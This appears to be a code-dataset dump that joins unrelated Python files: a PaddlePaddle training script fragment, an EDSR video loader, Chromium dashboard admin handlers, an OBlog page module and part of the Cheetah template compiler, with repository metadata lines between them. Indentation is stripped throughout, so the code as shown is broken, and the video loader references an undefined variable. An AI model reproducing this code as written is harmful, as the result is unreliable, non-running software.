lr_scheduler = paddle.optimizer.lr.MultiStepDecay(learning_rate=args.learning_rate, milestones=[m*len(train_loader) for m in args.milestones], gamma=args.gamma)
optimizer = paddle.optimizer.Momentum(parameters=model.parameters(),
learning_rate=lr_scheduler,
momentum=args.momentum,
weight_decay=args.weight_decay,
use_nesterov=args.nesterov)
elif args.optimizer == 'adam':
optimizer = paddle.optimizer.AdamW(parameters=model.parameters(),
learning_rate=args.learning_rate,
weight_decay=args.weight_decay)
else:
raise ValueError("optimizer must be sgd or adam.")
model = paddle.Model(model)
model.prepare(optimizer=optimizer, #指定优化器
loss=criterion, #指定损失函数
metrics=paddle.metric.Accuracy()) #指定评估方法
#用于visualdl可视化
visualdl = paddle.callbacks.VisualDL(log_dir=args.save_dir)
#早停机制,这里使用只是为了在训练过程中保存验证集上的最佳模型,最后用于测试集验证
early_stop = paddle.callbacks.EarlyStopping('acc', mode='max', patience=args.epochs, verbose=1,
min_delta=0, baseline=None, save_best_model=True)
model.fit(train_data=train_loader, #训练数据集
eval_data=val_loader, #验证数据集
epochs=args.epochs, #迭代轮次
save_dir=args.save_dir, #把模型参数、优化器参数保存至自定义的文件夹
save_freq=args.save_interval, #设定每隔多少个epoch保存模型参数及优化器参数
verbose=1,
log_freq=20,
eval_freq=args.eval_freq,
callbacks=[visualdl, early_stop])
#用验证集上最好模型在测试集上验证精度
model.load(os.path.join(args.save_dir, 'best_model.pdparams'))
result = model.evaluate(eval_data=test_loader, verbose=1)
print('test acc:', result['acc'], 'test error:', 1-result['acc'])
if __name__ == '__main__':
args = parser_args()
utils.seed_paddle(args.seed)
if not args.high_level_api:
train_model(args)
else:
train_hl_api(args) | 2 | 2 |
dataloader/EDSR/video.py | pidan1231239/SR-Stereo2 | 1 | 11312 | import os
from . import common
import cv2
import numpy as np
import imageio
import torch
import torch.utils.data as data
class Video(data.Dataset):
def __init__(self, args, name='Video', train=False, benchmark=False):
self.args = args
self.name = name
self.scale = args.scale
self.idx_scale = 0
self.train = False
self.do_eval = False
self.benchmark = benchmark
self.filename, _ = os.path.splitext(os.path.basename(args.dir_demo))
self.vidcap = cv2.VideoCapture(args.dir_demo)
self.n_frames = 0
self.total_frames = int(self.vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
def __getitem__(self, idx):
success, lr = self.vidcap.read()
if success:
self.n_frames += 1
lr, = common.set_channel(lr, n_channels=self.args.n_colors)
lr_t, = common.np2Tensor(lr, rgb_range=self.args.rgb_range)
return lr_t, -1, '{}_{:0>5}'.format(self.filename, self.n_frames)
else:
vidcap.release()
return None
def __len__(self):
return self.total_frames
def set_scale(self, idx_scale):
self.idx_scale = idx_scale
| 2.46875 | 2 |
backend/views/__init__.py | chriamue/flask-unchained-react-spa | 5 | 11313 | <filename>backend/views/__init__.py
from .contact_submission_resource import ContactSubmissionResource
| 1.085938 | 1 |
blink_handler.py | oyiptong/chromium-dashboard | 0 | 11314 | <filename>blink_handler.py
# -*- coding: utf-8 -*-
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = '<EMAIL> (<NAME>)'
import collections
import json
import logging
import os
import webapp2
import yaml
# Appengine imports.
from google.appengine.api import memcache
import common
import models
import settings
import util
from schedule import construct_chrome_channels_details
class PopulateSubscribersHandler(common.ContentHandler):
def __populate_subscribers(self):
"""Seeds the database with the team in devrel_team.yaml and adds the team
member to the specified blink components in that file. Should only be ran
if the FeatureOwner database entries have been cleared"""
f = file('%s/data/devrel_team.yaml' % settings.ROOT_DIR, 'r')
for profile in yaml.load_all(f):
blink_components = profile.get('blink_components', [])
blink_components = [models.BlinkComponent.get_by_name(name).key() for name in blink_components]
blink_components = filter(None, blink_components) # Filter out None values
user = models.FeatureOwner(
name=unicode(profile['name']),
email=unicode(profile['email']),
twitter=profile.get('twitter', None),
blink_components=blink_components,
primary_blink_components=blink_components,
watching_all_features=False,
)
user.put()
f.close()
@common.require_edit_permission
def get(self):
if settings.PROD:
return self.response.out.write('Handler not allowed in production.')
models.BlinkComponent.update_db()
self.__populate_subscribers()
return self.redirect('/admin/blink')
class BlinkHandler(common.ContentHandler):
def __update_subscribers_list(self, add=True, user_id=None, blink_component=None, primary=False):
if not user_id or not blink_component:
return False
user = models.FeatureOwner.get_by_id(long(user_id))
if not user:
return True
if primary:
if add:
user.add_as_component_owner(blink_component)
else:
user.remove_as_component_owner(blink_component)
else:
if add:
user.add_to_component_subscribers(blink_component)
else:
user.remove_from_component_subscribers(blink_component)
return True
@common.require_edit_permission
@common.strip_trailing_slash
def get(self, path):
# key = '%s|blinkcomponentowners' % (settings.MEMCACHE_KEY_PREFIX)
# data = memcache.get(key)
# if data is None:
components = models.BlinkComponent.all().order('name').fetch(None)
subscribers = models.FeatureOwner.all().order('name').fetch(None)
# Format for django template
subscribers = [x.format_for_template() for x in subscribers]
for c in components:
c.primaries = [o.name for o in c.owners]
# wf_component_content = models.BlinkComponent.fetch_wf_content_for_components()
# for c in components:
# c.wf_urls = wf_component_content.get(c.name) or []
data = {
'subscribers': subscribers,
'components': components[1:] # ditch generic "Blink" component
}
# memcache.set(key, data)
self.render(data, template_path=os.path.join('admin/blink.html'))
# Remove user from component subscribers.
def put(self, path):
params = json.loads(self.request.body)
self.__update_subscribers_list(False, user_id=params.get('userId'),
blink_component=params.get('componentName'),
primary=params.get('primary'))
self.response.set_status(200, message='User removed from subscribers')
return self.response.write(json.dumps({'done': True}))
# Add user to component subscribers.
def post(self, path):
params = json.loads(self.request.body)
self.__update_subscribers_list(True, user_id=params.get('userId'),
blink_component=params.get('componentName'),
primary=params.get('primary'))
# memcache.flush_all()
# memcache.delete('%s|blinkcomponentowners' % (settings.MEMCACHE_KEY_PREFIX))
self.response.set_status(200, message='User added to subscribers')
return self.response.write(json.dumps(params))
class SubscribersHandler(common.ContentHandler):
@common.require_edit_permission
# @common.strip_trailing_slash
def get(self, path):
users = models.FeatureOwner.all().order('name').fetch(None)
feature_list = models.Feature.get_chronological()
milestone = self.request.get('milestone') or None
if milestone:
milestone = int(milestone)
feature_list = filter(lambda f: (f['shipped_milestone'] or f['shipped_android_milestone']) == milestone, feature_list)
list_features_per_owner = 'showFeatures' in self.request.GET
for user in users:
# user.subscribed_components = [models.BlinkComponent.get(key) for key in user.blink_components]
user.owned_components = [models.BlinkComponent.get(key) for key in user.primary_blink_components]
for component in user.owned_components:
component.features = []
if list_features_per_owner:
component.features = filter(lambda f: component.name in f['blink_components'], feature_list)
details = construct_chrome_channels_details()
data = {
'subscribers': users,
'channels': collections.OrderedDict([
('stable', details['stable']),
('beta', details['beta']),
('dev', details['dev']),
('canary', details['canary']),
]),
'selected_milestone': int(milestone) if milestone else None
}
self.render(data, template_path=os.path.join('admin/subscribers.html'))
app = webapp2.WSGIApplication([
('/admin/blink/populate_subscribers', PopulateSubscribersHandler),
('/admin/subscribers(.*)', SubscribersHandler),
('(.*)', BlinkHandler),
], debug=settings.DEBUG)
| 2.234375 | 2 |
OBlog/blueprint/pages/main.py | OhYee/OBlog | 23 | 11315 | <gh_stars>10-100
from OBlog import database as db
from flask import g, current_app
import re
def getPages():
if not hasattr(g, "getPages"):
res = db.query_db('select * from pages;')
res.sort(key=lambda x: int(x["idx"]))
g.getPages = res
return g.getPages
def getPagesDict():
if not hasattr(g, "getPagesDict"):
pages = getPages()
res = dict((page['url'], page) for page in pages)
g.getPagesDict = res
return g.getPagesDict
def addPages(postRequest):
current_app.logger.debug(postRequest)
if db.exist_db('pages', {'url': postRequest['url']}):
# 已经存在
return 1
if not (re.match(r'^[0-9]+$', postRequest["idx"])):
return 2
keyList = ['url', 'title', 'idx']
postRequest = dict((key, postRequest[key] if key in postRequest else "")for key in keyList)
postRequest['show'] = 'true'
db.insert_db('pages', postRequest)
return 0
def updatePage(postRequest):
current_app.logger.debug(postRequest)
oldurl = postRequest['oldurl']
url = postRequest['url']
if url != oldurl and db.exist_db('pages', {'url': url}):
# 重复url
return 1
if not (re.match(r'^[0-9]+$', postRequest["idx"])):
return 2
keyList = ['url', 'title', 'idx', 'show']
postRequest = dict((key, postRequest[key] if key in postRequest else "")for key in keyList)
db.update_db("pages", postRequest, {'url': oldurl})
return 0
def deletePage(postRequest):
current_app.logger.debug(postRequest)
url = postRequest['url']
if not db.exist_db('pages', {'url': url}):
# 不存在
return 1
db.delete_db("pages", {'url': url})
return 0
import os
def absPath(path):
from OBlog import app
path = os.path.join(app.config['ROOTPATH'],
"OBlog/templates/pages", path)
return path
def fileExist(path):
return os.path.exists(path) == True
def getPageTemplate(path):
path = absPath(path)
if not fileExist(path):
return (1, "")
content = ""
with open(path, 'r', encoding='utf-8') as f:
content = f.read()
return (0, content)
def getPageTemplateList():
return listFiles(absPath('.'))
def listFiles(path):
return [file
for file in os.listdir(path)
if os.path.isfile(os.path.join(path, file))]
def setPageTemplate(path, content):
path = absPath(path)
with open(path, 'w', encoding='utf-8') as f:
f.write(content)
return 0
def delPageTemplate(path):
path = absPath(path)
if not fileExist(path):
return 1
os.remove(path)
return 0
| 2.546875 | 3 |
lib/rabbitmq-dotnet-client-rabbitmq_v3_4_4/docs/pyle2-fcfcf7e/Cheetah/Compiler.py | CymaticLabs/Unity3d.Amqp | 83 | 11316 | #!/usr/bin/env python
# $Id: Compiler.py,v 1.148 2006/06/22 00:18:22 tavis_rudd Exp $
"""Compiler classes for Cheetah:
ModuleCompiler aka 'Compiler'
ClassCompiler
MethodCompiler
If you are trying to grok this code start with ModuleCompiler.__init__,
ModuleCompiler.compile, and ModuleCompiler.__getattr__.
Meta-Data
================================================================================
Author: <NAME> <<EMAIL>>
Version: $Revision: 1.148 $
Start Date: 2001/09/19
Last Revision Date: $Date: 2006/06/22 00:18:22 $
"""
__author__ = "<NAME> <<EMAIL>>"
__revision__ = "$Revision: 1.148 $"[11:-2]
import sys
import os
import os.path
from os.path import getmtime, exists
import re
import types
import time
import random
import warnings
import __builtin__
import copy
from Cheetah.Version import Version, VersionTuple
from Cheetah.SettingsManager import SettingsManager
from Cheetah.Parser import Parser, ParseError, specialVarRE, \
STATIC_CACHE, REFRESH_CACHE, SET_LOCAL, SET_GLOBAL,SET_MODULE
from Cheetah.Utils.Indenter import indentize # an undocumented preprocessor
from Cheetah import ErrorCatchers
from Cheetah import NameMapper
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
class Error(Exception): pass
DEFAULT_COMPILER_SETTINGS = {
## controlling the handling of Cheetah $placeholders
'useNameMapper': True, # Unified dotted notation and the searchList
'useSearchList': True, # if false, assume the first
# portion of the $variable (before the first dot) is a global,
# builtin, or local var that doesn't need
# looking up in the searchlist BUT use
# namemapper on the rest of the lookup
'allowSearchListAsMethArg': True,
'useAutocalling': True, # detect and call callable()'s, requires NameMapper
'useStackFrames': True, # use NameMapper.valueFromFrameOrSearchList
# rather than NameMapper.valueFromSearchList
'useErrorCatcher':False,
'alwaysFilterNone':True, # filter out None, before the filter is called
'useFilters':True, # use str instead if =False
'includeRawExprInFilterArgs':True,
#'lookForTransactionAttr':False,
'autoAssignDummyTransactionToSelf':False,
'useKWsDictArgForPassingTrans':True,
## controlling the aesthetic appearance / behaviour of generated code
'commentOffset': 1,
# should shorter str constant chunks be printed using repr rather than ''' quotes
'reprShortStrConstants': True,
'reprNewlineThreshold':3,
'outputRowColComments':True,
# should #block's be wrapped in a comment in the template's output
'includeBlockMarkers': False,
'blockMarkerStart':('\n<!-- START BLOCK: ',' -->\n'),
'blockMarkerEnd':('\n<!-- END BLOCK: ',' -->\n'),
'defDocStrMsg':'Autogenerated by CHEETAH: The Python-Powered Template Engine',
'setup__str__method': False,
'mainMethodName':'respond',
'mainMethodNameForSubclasses':'writeBody',
'indentationStep': ' '*4,
'initialMethIndentLevel': 2,
'monitorSrcFile':False,
'outputMethodsBeforeAttributes': True,
## customizing the #extends directive
'autoImportForExtendsDirective':True,
'handlerForExtendsDirective':None, # baseClassName = handler(compiler, baseClassName)
# a callback hook for customizing the
# #extends directive. It can manipulate
# the compiler's state if needed.
# also see allowExpressionsInExtendsDirective
# input filtering/restriction
# use lower case keys here!!
'disabledDirectives':[], # list of directive keys, without the start token
'enabledDirectives':[], # list of directive keys, without the start token
'disabledDirectiveHooks':[], # callable(parser, directiveKey)
'preparseDirectiveHooks':[], # callable(parser, directiveKey)
'postparseDirectiveHooks':[], # callable(parser, directiveKey)
'preparsePlaceholderHooks':[], # callable(parser)
'postparsePlaceholderHooks':[], # callable(parser)
# the above hooks don't need to return anything
'expressionFilterHooks':[], # callable(parser, expr, exprType, rawExpr=None, startPos=None)
# exprType is the name of the directive, 'psp', or 'placeholder'. all
# lowercase. The filters *must* return the expr or raise an exception.
# They can modify the expr if needed.
'templateMetaclass':None, # strictly optional. Only works with new-style baseclasses
'i18NFunctionName':'self.i18n',
## These are used in the parser, but I've put them here for the time being to
## facilitate separating the parser and compiler:
'cheetahVarStartToken':'$',
'commentStartToken':'##',
'multiLineCommentStartToken':'#*',
'multiLineCommentEndToken':'*#',
'gobbleWhitespaceAroundMultiLineComments':True,
'directiveStartToken':'#',
'directiveEndToken':'#',
'allowWhitespaceAfterDirectiveStartToken':False,
'PSPStartToken':'<%',
'PSPEndToken':'%>',
'EOLSlurpToken':'#',
'gettextTokens': ["_", "N_", "ngettext"],
'allowExpressionsInExtendsDirective': False, # the default restricts it to
# accepting dotted names
'allowEmptySingleLineMethods': False,
'allowNestedDefScopes': True,
'allowPlaceholderFilterArgs': True,
## See Parser.initDirectives() for the use of the next 3
#'directiveNamesAndParsers':{}
#'endDirectiveNamesAndHandlers':{}
#'macroDirectives':{}
}
class GenUtils:
"""An abstract baseclass for the Compiler classes that provides methods that
perform generic utility functions or generate pieces of output code from
information passed in by the Parser baseclass. These methods don't do any
parsing themselves.
"""
def genTimeInterval(self, timeString):
##@@ TR: need to add some error handling here
if timeString[-1] == 's':
interval = float(timeString[:-1])
elif timeString[-1] == 'm':
interval = float(timeString[:-1])*60
elif timeString[-1] == 'h':
interval = float(timeString[:-1])*60*60
elif timeString[-1] == 'd':
interval = float(timeString[:-1])*60*60*24
elif timeString[-1] == 'w':
interval = float(timeString[:-1])*60*60*24*7
else: # default to minutes
interval = float(timeString)*60
return interval
def genCacheInfo(self, cacheTokenParts):
"""Decipher a placeholder cachetoken
"""
cacheInfo = {}
if cacheTokenParts['REFRESH_CACHE']:
cacheInfo['type'] = REFRESH_CACHE
cacheInfo['interval'] = self.genTimeInterval(cacheTokenParts['interval'])
elif cacheTokenParts['STATIC_CACHE']:
cacheInfo['type'] = STATIC_CACHE
return cacheInfo # is empty if no cache
def genCacheInfoFromArgList(self, argList):
cacheInfo = {'type':REFRESH_CACHE}
for key, val in argList:
if val[0] in '"\'':
val = val[1:-1]
if key == 'timer':
key = 'interval'
val = self.genTimeInterval(val)
cacheInfo[key] = val
return cacheInfo
def genCheetahVar(self, nameChunks, plain=False):
if nameChunks[0][0] in self.setting('gettextTokens'):
self.addGetTextVar(nameChunks)
if self.setting('useNameMapper') and not plain:
return self.genNameMapperVar(nameChunks)
else:
return self.genPlainVar(nameChunks)
def addGetTextVar(self, nameChunks):
"""Output something that gettext can recognize.
This is a harmless side effect necessary to make gettext work when it
is scanning compiled templates for strings marked for translation.
@@TR: another marginally more efficient approach would be to put the
output in a dummy method that is never called.
"""
# @@TR: this should be in the compiler not here
self.addChunk("if False:")
self.indent()
self.addChunk(self.genPlainVar(nameChunks[:]))
self.dedent()
def genPlainVar(self, nameChunks):
"""Generate Python code for a Cheetah $var without using NameMapper
(Unified Dotted Notation with the SearchList).
"""
nameChunks.reverse()
chunk = nameChunks.pop()
pythonCode = chunk[0] + chunk[2]
while nameChunks:
chunk = nameChunks.pop()
pythonCode = (pythonCode + '.' + chunk[0] + chunk[2])
return pythonCode
def genNameMapperVar(self, nameChunks):
"""Generate valid Python code for a Cheetah $var, using NameMapper
(Unified Dotted Notation with the SearchList).
nameChunks = list of var subcomponents represented as tuples
[ (name,useAC,remainderOfExpr),
]
where:
name = the dotted name base
useAC = where NameMapper should use autocalling on namemapperPart
remainderOfExpr = any arglist, index, or slice
If remainderOfExpr contains a call arglist (e.g. '(1234)') then useAC
is False, otherwise it defaults to True. It is overridden by the global
setting 'useAutocalling' if this setting is False.
EXAMPLE
------------------------------------------------------------------------
if the raw Cheetah Var is
$a.b.c[1].d().x.y.z
nameChunks is the list
[ ('a.b.c',True,'[1]'), # A
('d',False,'()'), # B
('x.y.z',True,''), # C
]
When this method is fed the list above it returns
VFN(VFN(VFFSL(SL, 'a.b.c',True)[1], 'd',False)(), 'x.y.z',True)
which can be represented as
VFN(B`, name=C[0], executeCallables=(useAC and C[1]))C[2]
where:
VFN = NameMapper.valueForName
VFFSL = NameMapper.valueFromFrameOrSearchList
VFSL = NameMapper.valueFromSearchList # optionally used instead of VFFSL
SL = self.searchList()
useAC = self.setting('useAutocalling') # True in this example
A = ('a.b.c',True,'[1]')
B = ('d',False,'()')
C = ('x.y.z',True,'')
C` = VFN( VFN( VFFSL(SL, 'a.b.c',True)[1],
'd',False)(),
'x.y.z',True)
= VFN(B`, name='x.y.z', executeCallables=True)
B` = VFN(A`, name=B[0], executeCallables=(useAC and B[1]))B[2]
A` = VFFSL(SL, name=A[0], executeCallables=(useAC and A[1]))A[2]
Note, if the compiler setting useStackFrames=False (default is true)
then
A` = VFSL([locals()]+SL+[globals(), __builtin__], name=A[0], executeCallables=(useAC and A[1]))A[2]
This option allows Cheetah to be used with Psyco, which doesn't support
stack frame introspection.
"""
defaultUseAC = self.setting('useAutocalling')
useSearchList = self.setting('useSearchList')
nameChunks.reverse()
name, useAC, remainder = nameChunks.pop()
if not useSearchList:
firstDotIdx = name.find('.')
if firstDotIdx != -1 and firstDotIdx < len(name):
beforeFirstDot, afterDot = name[:firstDotIdx], name[firstDotIdx+1:]
pythonCode = ('VFN(' + beforeFirstDot +
',"' + afterDot +
'",' + repr(defaultUseAC and useAC) + ')'
+ remainder)
else:
pythonCode = name+remainder
elif self.setting('useStackFrames'):
pythonCode = ('VFFSL(SL,'
'"'+ name + '",'
+ repr(defaultUseAC and useAC) + ')'
+ remainder)
else:
pythonCode = ('VFSL([locals()]+SL+[globals(), __builtin__],'
'"'+ name + '",'
+ repr(defaultUseAC and useAC) + ')'
+ remainder)
##
while nameChunks:
name, useAC, remainder = nameChunks.pop()
pythonCode = ('VFN(' + pythonCode +
',"' + name +
'",' + repr(defaultUseAC and useAC) + ')'
+ remainder)
return pythonCode
##################################################
## METHOD COMPILERS
class MethodCompiler(GenUtils):
def __init__(self, methodName, classCompiler,
initialMethodComment=None,
decorator=None):
self._settingsManager = classCompiler
self._classCompiler = classCompiler
self._moduleCompiler = classCompiler._moduleCompiler
self._methodName = methodName
self._initialMethodComment = initialMethodComment
self._setupState()
self._decorator = decorator
def setting(self, key):
return self._settingsManager.setting(key)
def _setupState(self):
self._indent = self.setting('indentationStep')
self._indentLev = self.setting('initialMethIndentLevel')
self._pendingStrConstChunks = []
self._methodSignature = None
self._methodDef = None
self._docStringLines = []
self._methodBodyChunks = []
self._cacheRegionsStack = []
self._callRegionsStack = []
self._captureRegionsStack = []
self._filterRegionsStack = []
self._isErrorCatcherOn = False
self._hasReturnStatement = False
self._isGenerator = False
def cleanupState(self):
"""Called by the containing class compiler instance
"""
pass
def methodName(self):
return self._methodName
def setMethodName(self, name):
self._methodName = name
## methods for managing indentation
def indentation(self):
return self._indent * self._indentLev
def indent(self):
self._indentLev +=1
def dedent(self):
if self._indentLev:
self._indentLev -=1
else:
raise Error('Attempt to dedent when the indentLev is 0')
## methods for final code wrapping
def methodDef(self):
if self._methodDef:
return self._methodDef
else:
return self.wrapCode()
__str__ = methodDef
def wrapCode(self):
self.commitStrConst()
methodDefChunks = (
self.methodSignature(),
'\n',
self.docString(),
self.methodBody() )
methodDef = ''.join(methodDefChunks)
self._methodDef = methodDef
return methodDef
def methodSignature(self):
return self._indent + self._methodSignature + ':'
def setMethodSignature(self, signature):
self._methodSignature = signature
def methodBody(self):
return ''.join( self._methodBodyChunks )
def docString(self):
if not self._docStringLines:
return ''
ind = self._indent*2
docStr = (ind + '"""\n' + ind +
('\n' + ind).join([ln.replace('"""',"'''") for ln in self._docStringLines]) +
'\n' + ind + '"""\n')
return docStr
## methods for adding code
def addMethDocString(self, line):
self._docStringLines.append(line.replace('%','%%'))
def addChunk(self, chunk):
self.commitStrConst()
chunk = "\n" + self.indentation() + chunk
self._methodBodyChunks.append(chunk)
def appendToPrevChunk(self, appendage):
self._methodBodyChunks[-1] = self._methodBodyChunks[-1] + appendage
def addWriteChunk(self, chunk):
self.addChunk('write(' + chunk + ')')
def addFilteredChunk(self, chunk, filterArgs=None, rawExpr=None, lineCol=None):
if filterArgs is None:
filterArgs = ''
if self.setting('includeRawExprInFilterArgs') and rawExpr:
filterArgs += ', rawExpr=%s'%repr(rawExpr)
if self.setting('alwaysFilterNone'):
if rawExpr and rawExpr.find('\n')==-1 and rawExpr.find('\r')==-1:
self.addChunk("_v = %s # %r"%(chunk, rawExpr))
if lineCol:
self.appendToPrevChunk(' on line %s, col %s'%lineCol)
else:
self.addChunk("_v = %s"%chunk)
if self.setting('useFilters'):
self.addChunk("if _v is not None: write(_filter(_v%s))"%filterArgs)
else:
self.addChunk("if _v is not None: write(str(_v))")
else:
if self.setting('useFilters'):
self.addChunk("write(_filter(%s%s))"%(chunk,filterArgs))
else:
self.addChunk("write(str(%s))"%chunk)
def _appendToPrevStrConst(self, strConst):
if self._pendingStrConstChunks:
self._pendingStrConstChunks.append(strConst)
else:
self._pendingStrConstChunks = [strConst]
def _unescapeCheetahVars(self, theString):
"""Unescape any escaped Cheetah \$vars in the string.
"""
token = self.setting('cheetahVarStartToken')
return theString.replace('\\' + token, token)
def _unescapeDirectives(self, theString):
"""Unescape any escaped Cheetah \$vars in the string.
"""
token = self.setting('directiveStartToken')
return theString.replace('\\' + token, token)
def commitStrConst(self):
"""Add the code for outputting the pending strConst without chopping off
any whitespace from it.
"""
if self._pendingStrConstChunks:
strConst = self._unescapeCheetahVars(''.join(self._pendingStrConstChunks))
strConst = self._unescapeDirectives(strConst)
self._pendingStrConstChunks = []
if not strConst:
return
if self.setting('reprShortStrConstants') and \
strConst.count('\n') < self.setting('reprNewlineThreshold'):
self.addWriteChunk( repr(strConst).replace('\\012','\\n'))
else:
strConst = strConst.replace('\\','\\\\').replace("'''","'\'\'\'")
if strConst[0] == "'":
strConst = '\\' + strConst
if strConst[-1] == "'":
strConst = strConst[:-1] + '\\' + strConst[-1]
self.addWriteChunk("'''" + strConst + "'''" )
def handleWSBeforeDirective(self):
"""Truncate the pending strCont to the beginning of the current line.
"""
if self._pendingStrConstChunks:
src = self._pendingStrConstChunks[-1]
BOL = max(src.rfind('\n')+1, src.rfind('\r')+1, 0)
if BOL < len(src):
self._pendingStrConstChunks[-1] = src[:BOL]
def isErrorCatcherOn(self):
return self._isErrorCatcherOn
def turnErrorCatcherOn(self):
self._isErrorCatcherOn = True
def turnErrorCatcherOff(self):
self._isErrorCatcherOn = False
# @@TR: consider merging the next two methods into one
def addStrConst(self, strConst):
self._appendToPrevStrConst(strConst)
def addRawText(self, text):
self.addStrConst(text)
def addMethComment(self, comm):
offSet = self.setting('commentOffset')
self.addChunk('#' + ' '*offSet + comm)
def addPlaceholder(self, expr, filterArgs, rawPlaceholder,
cacheTokenParts, lineCol,
silentMode=False):
cacheInfo = self.genCacheInfo(cacheTokenParts)
if cacheInfo:
cacheInfo['ID'] = repr(rawPlaceholder)[1:-1]
self.startCacheRegion(cacheInfo, lineCol, rawPlaceholder=rawPlaceholder)
if self.isErrorCatcherOn():
methodName = self._classCompiler.addErrorCatcherCall(
expr, rawCode=rawPlaceholder, lineCol=lineCol)
expr = 'self.' + methodName + '(localsDict=locals())'
if silentMode:
self.addChunk('try:')
self.indent()
self.addFilteredChunk(expr, filterArgs, rawPlaceholder, lineCol=lineCol)
self.dedent()
self.addChunk('except NotFound: pass')
else:
self.addFilteredChunk(expr, filterArgs, rawPlaceholder, lineCol=lineCol)
if self.setting('outputRowColComments'):
self.appendToPrevChunk(' # from line %s, col %s' % lineCol + '.')
if cacheInfo:
self.endCacheRegion()
def addSilent(self, expr):
self.addChunk( expr )
def addEcho(self, expr, rawExpr=None):
self.addFilteredChunk(expr, rawExpr=rawExpr)
def addSet(self, expr, exprComponents, setStyle):
if setStyle is SET_GLOBAL:
(LVALUE, OP, RVALUE) = (exprComponents.LVALUE,
exprComponents.OP,
exprComponents.RVALUE)
# we need to split the LVALUE to deal with globalSetVars
splitPos1 = LVALUE.find('.')
splitPos2 = LVALUE.find('[')
if splitPos1 > 0 and splitPos2==-1:
splitPos = splitPos1
elif splitPos1 > 0 and splitPos1 < max(splitPos2,0):
splitPos = splitPos1
else:
splitPos = splitPos2
if splitPos >0:
primary = LVALUE[:splitPos]
secondary = LVALUE[splitPos:]
else:
primary = LVALUE
secondary = ''
LVALUE = 'self._CHEETAH__globalSetVars["' + primary + '"]' + secondary
expr = LVALUE + ' ' + OP + ' ' + RVALUE.strip()
if setStyle is SET_MODULE:
self._moduleCompiler.addModuleGlobal(expr)
else:
self.addChunk(expr)
def addInclude(self, sourceExpr, includeFrom, isRaw):
self.addChunk('self._handleCheetahInclude(' + sourceExpr +
', trans=trans, ' +
'includeFrom="' + includeFrom + '", raw=' +
repr(isRaw) + ')')
def addWhile(self, expr, lineCol=None):
self.addIndentingDirective(expr, lineCol=lineCol)
def addFor(self, expr, lineCol=None):
self.addIndentingDirective(expr, lineCol=lineCol)
def addRepeat(self, expr, lineCol=None):
#the _repeatCount stuff here allows nesting of #repeat directives
self._repeatCount = getattr(self, "_repeatCount", -1) + 1
self.addFor('for __i%s in range(%s)' % (self._repeatCount,expr), lineCol=lineCol)
def addIndentingDirective(self, expr, lineCol=None):
if expr and not expr[-1] == ':':
expr = expr + ':'
self.addChunk( expr )
if lineCol:
self.appendToPrevChunk(' # generated from line %s, col %s'%lineCol )
self.indent()
def addReIndentingDirective(self, expr, dedent=True, lineCol=None):
self.commitStrConst()
if dedent:
self.dedent()
if not expr[-1] == ':':
expr = expr + ':'
self.addChunk( expr )
if lineCol:
self.appendToPrevChunk(' # generated from line %s, col %s'%lineCol )
self.indent()
def addIf(self, expr, lineCol=None):
"""For a full #if ... #end if directive
"""
self.addIndentingDirective(expr, lineCol=lineCol)
def addOneLineIf(self, expr, lineCol=None):
"""For a full #if ... #end if directive
"""
self.addIndentingDirective(expr, lineCol=lineCol)
def addTernaryExpr(self, conditionExpr, trueExpr, falseExpr, lineCol=None):
"""For a single-lie #if ... then .... else ... directive
<condition> then <trueExpr> else <falseExpr>
"""
self.addIndentingDirective(conditionExpr, lineCol=lineCol)
self.addFilteredChunk(trueExpr)
self.dedent()
self.addIndentingDirective('else')
self.addFilteredChunk(falseExpr)
self.dedent()
def addElse(self, expr, dedent=True, lineCol=None):
expr = re.sub(r'else[ \f\t]+if','elif', expr)
self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)
def addElif(self, expr, dedent=True, lineCol=None):
self.addElse(expr, dedent=dedent, lineCol=lineCol)
def addUnless(self, expr, lineCol=None):
self.addIf('if not (' + expr + ')')
def addClosure(self, functionName, argsList, parserComment):
argStringChunks = []
for arg in argsList:
chunk = arg[0]
if not arg[1] == None:
chunk += '=' + arg[1]
argStringChunks.append(chunk)
signature = "def " + functionName + "(" + ','.join(argStringChunks) + "):"
self.addIndentingDirective(signature)
self.addChunk('#'+parserComment)
def addTry(self, expr, lineCol=None):
self.addIndentingDirective(expr, lineCol=lineCol)
def addExcept(self, expr, dedent=True, lineCol=None):
self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)
def addFinally(self, expr, dedent=True, lineCol=None):
self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)
def addReturn(self, expr):
assert not self._isGenerator
self.addChunk(expr)
self._hasReturnStatement = True
def addYield(self, expr):
assert not self._hasReturnStatement
self._isGenerator = True
if expr.replace('yield','').strip():
self.addChunk(expr)
else:
self.addChunk('if _dummyTrans:')
self.indent()
self.addChunk('yield trans.response().getvalue()')
self.addChunk('trans = DummyTransaction()')
self.addChunk('write = trans.response().write')
self.dedent()
self.addChunk('else:')
self.indent()
self.addChunk(
'raise TypeError("This method cannot be called with a trans arg")')
self.dedent()
def addPass(self, expr):
self.addChunk(expr)
def addDel(self, expr):
self.addChunk(expr)
def addAssert(self, expr):
self.addChunk(expr)
def addRaise(self, expr):
self.addChunk(expr)
def addBreak(self, expr):
self.addChunk(expr)
def addContinue(self, expr):
self.addChunk(expr)
def addPSP(self, PSP):
self.commitStrConst()
autoIndent = False
if PSP[0] == '=':
PSP = PSP[1:]
if PSP:
self.addWriteChunk('_filter(' + PSP + ')')
return
elif PSP.lower() == 'end':
self.dedent()
return
elif PSP[-1] == '$':
autoIndent = True
PSP = PSP[:-1]
elif PSP[-1] == ':':
autoIndent = True
for line in PSP.splitlines():
self.addChunk(line)
if autoIndent:
self.indent()
def nextCacheID(self):
return ('_'+str(random.randrange(100, 999))
+ str(random.randrange(10000, 99999)))
def startCacheRegion(self, cacheInfo, lineCol, rawPlaceholder=None):
# @@TR: we should add some runtime logging to this
ID = self.nextCacheID()
interval = cacheInfo.get('interval',None)
